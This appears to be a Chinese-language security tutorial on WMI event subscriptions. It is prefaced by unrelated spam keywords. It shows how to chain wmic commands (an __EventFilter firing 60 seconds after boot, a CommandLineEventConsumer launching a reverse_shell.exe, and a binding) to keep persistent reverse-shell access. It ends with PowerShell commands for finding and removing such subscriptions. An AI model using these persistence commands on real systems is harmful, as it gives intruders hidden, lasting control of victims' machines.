挖金矿游戏网站建设,余干县建设局网站,网络营销方式ppt,外贸SOHO建公司网站文章目录 一、WMI事件订阅机制简介二、利用事件订阅进行权限维持三、防御方式 一、WMI事件订阅机制简介
WMI#xff08;Windows Management Instrumentation#xff0c;Windows管理规范#xff09;是windows提供的一种能够直接与系统进行交互的机制#xff0c;旨在为系统中… 文章目录 一、WMI事件订阅机制简介二、利用事件订阅进行权限维持三、防御方式 一、WMI事件订阅机制简介
WMIWindows Management InstrumentationWindows管理规范是windows提供的一种能够直接与系统进行交互的机制旨在为系统中运行的各程序界定一套独立于环境的标准允许系统中允许的程序相互交流系统的程序管理信息。
WMI事件是Windows管理架构中的一部分它可以监视应用程序的运行、响应系统和应用程序的事件。通过使用WMI事件应用程序可以接收系统各类通知并且在特定事件发生时采取相应的措施。例如磁盘空间不足时可以通过WMI事件来发出警报等。WMI事件可以通过编写WMI查询或使用WMI事件订阅API来捕获。
WMI事件订阅是一种消息机制用来监听事件类的触发。简单来书设置一个监听磁盘空间不足的事件订阅程序可以在磁盘不足的第一时间接收到WMI的告警。事件订阅中有很多类这里主要关注以下类
类名作用EventFilter触发器EventConsumer执行动作FilterToConsumerBinding绑定过滤器和消费者类负责捆绑EventFilter和EventConsumer
二、利用事件订阅进行权限维持
1、WQL是一种类似SQL的查询语句是WMI提供的一种用于WMI查询或WMI事件订阅的语句。在命令行中输入wbemtest打开Windows Management Instrumentation测试器来通过WQL语句查询系统信息。
wbemtest打开后进入一个命名空间点击“连接”——“查询”。 使用WQL查询当前系统中所有进程的PID。
select * from Win32_Process此外还有其他查询语句。
# 获取主机名
select * from Win32_ComputerSystem
# 获取BOIS信息
select * from Win32_BOIS
# 获取键盘信息
select * from Win32_Keyboard
# 获取服务列表
select * from Win32_Service
# 获取磁盘列表
select * from Win32_LogicalDisk
# 获取光驱信息
select * from Win32_CDROMDriver2、利用WMI通知查询的方式来监听windows打印机任务选择“通知查询”。并使用如下WQL语句
select * from __InstanceCreationEvent within 0.001 where TargetInstance ISA Win32_PrintJob
# __InstanceCreateEvent代表windows事件类
# within 0.001代表轮询时间轮询时间为0.001s可以理解为每毫秒查询一次该事件
# TargetInstance实例名称
# ISA等于
# Win32_PrintJob打印机名称3、我们可以将通知查询和执行动作进行捆绑捆绑之后系统触发某项查询规则时会立即执行对应动作。首先创建一个触发器代码如下
# 在系统初始化之后的第60秒将会进行通知
wmic /namespace:\\root\subscription PATH __EventFilter create NameTestone,EventNameSpaceroot\cimv2,QuerylanguageWQL,Queryselect * from __InstanceModificationEvent within 60 where TargetInstance ISA Win32_PerfFormattedData_PerfOS_SYSTEM
# __EventFilter触发器
# Testone触发器名称
# 触发的通知条件由Query决定
# Win32_PerfFormattedData_PerfOS_SYSTEMwindows系统初始化4、创建好触发器后需要绑定一个对应的执行动作也就是触发器在查询到想要的内容后就会触发绑定的执行动作。执行动作需要将命名空间指定为触发器所设置的命名空间创建执行动作可以使用EventConsumer来完成。当然需要生成反弹shell设置监听器哈
# 当Testone时间被触发后C:\tmp\reverse_shell.exe将会被执行
wmic /namespace:\\root\subscription PATH CommandLineEventConsumer create NameTestone,ExecutablePathC:\tmp\reverse_shell.exe,CommandLineTemplateC:\tmp\reverse_shell.exe5、使用FilterToConsumerBinding来绑定刚刚所创建的触发器和执行动作。
# 绑定触发器和执行动作
wmic /namespace:\\root\subscription PATH __FilterToConsumerBinding create Filter__EventFilter.Name\Testone\,ConsumerCommandLineEventConsumer.Name\Testone\6、重启计算在系统进行初始化工作重启/重新登录的第60秒获取反弹shell。
三、防御方式
# 查询系统所有命名空间
Get-WmiObject -Namespace root -List -Recurse | Select -Unique __NAMESPACE# 查询root\subscription命名空间中是否存在执行恶意命令的触发器
Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer | select CommandLineTemplate,ExecutablePath# 列出事件过滤器
Get-WMIObject -Namespace root\Subscription -Class __EventFilter# 列出事件消费者
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer# 列出事件绑定
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding# 删除事件过滤器
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter NameTestone | Remove-WmiObject -Verbose# 删除事件消费者
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter NameTestone | Remove-WmiObject -Verbose# 删除事件绑定
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter __Path LIKE %Testone% | Remove-WmiObject -Verbose# 查询root\subscription命名空间中是否存在执行恶意命令的触发器
Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer | select CommandLineTemplate,ExecutablePath至此系统初始化后的第60s不会运行反弹shell脚本。
